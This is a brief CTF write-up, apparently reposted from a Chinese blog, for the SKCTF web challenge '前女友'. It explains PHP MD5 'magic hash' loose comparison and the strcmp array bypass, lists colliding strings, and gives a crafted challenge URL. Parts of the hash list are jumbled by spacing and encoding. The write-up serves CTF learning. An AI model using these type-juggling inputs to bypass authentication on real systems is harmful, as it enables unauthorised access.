write up: web 前女友(SKCTF)
生活随笔
收集整理的這篇文章主要介紹了
write up: web 前女友(SKCTF)
小編覺得挺不錯的,現(xiàn)在分享給大家,幫大家做個參考.
直接訪問:
一個簡單的md5比較漏洞和strcmp比較漏洞。
常用的幾個字符串及對應(yīng)的md5:
QNKCDZO 0e830400451993494058024219903391 240610708 0e46209743190650901 9562988736854 aabg7XSs 0e0873864821 36013740957780965295 aabC9RqS 0e041 0225181 657 28065344349536299 s878926199a 0e545993274517709034328855841020strcmp比較漏洞
5.3.3以后,當比較 **數(shù)組和字符串 **的時候,返回是0。
構(gòu)造一個url:
http://123.206.31.85:49162/?v1=QNKCDZO&v2=aabg7XSs&v3[]=1
end~
總結(jié)
以上是生活随笔為你收集整理的write up: web 前女友(SKCTF)的全部內(nèi)容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: kali-linux下搭建DVWA环境
- 下一篇: write up: web login1